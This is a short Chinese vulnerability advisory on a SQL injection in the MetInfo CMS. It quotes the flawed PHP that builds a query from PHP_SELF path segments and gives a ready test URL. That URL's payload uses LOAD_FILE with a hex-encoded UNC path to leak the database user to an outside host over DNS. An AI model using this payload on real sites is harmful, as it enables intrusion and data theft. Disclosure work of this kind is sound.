MetInfo 注入
- 发布时间:2016-11-25
- 公开时间:N/A
- 漏洞类型:sql注入
- 危害等级:高
- 漏洞编号:xianzhi-2016-11-61726270
- 测试版本:N/A
漏洞详情
app/system/include/compatible/metv5_top.php 行27$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELFs = explode('/', $PHP_SELF);
$query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'";
$column = DB::get_one($query);
$_SERVER['PHP_SELF']跟$_SERVER['SCRIPT_NAME']不同 前者包括pathinfo
比如
/index.php/something/else
$_SERVER['SCRIPT_NAME']就是index.php
而$_SERVER['PHP_SELF']是/index.php/something/else
这里explode之后进入了sql语句 造成注入 找一个包含的地方就可以了
测试方法:
由于metinfo默认没显错 这里注入点也没输出 所以用延时或者类似cloudeye.me的方法来做 需要适当编码http://192.168.1.170/metinfo/member/login.php/x'%20and%20if((SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT%20hex(user())),0x2e6c756461732e70772f2f666f6f626172))),1,1)%23%23/awireshark抓个包证明下吧

关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 农文旅融合绘就美丽乡村新图景 7993069
- 2 超级计算机算出人类灭绝时间 7989640
- 3 130亿三岁影帝接了多少广告 7879747
- 4 春回大地农事起 春耕备耕正当时 7756087
- 5 天雷滚滚我好怕怕传到联合国 7646183
- 6 下周将迎超级大回暖 气温火箭式飙升 7588257
- 7 男生用镜头记录下女友5年的蜕变 7432672
- 8 《家有儿女》花了多少经费在餐桌上 7380095
- 9 美国将完全退出联合国?联合国回应 7208244
- 10 美将限制与中国的双向投资 中方回应 7177636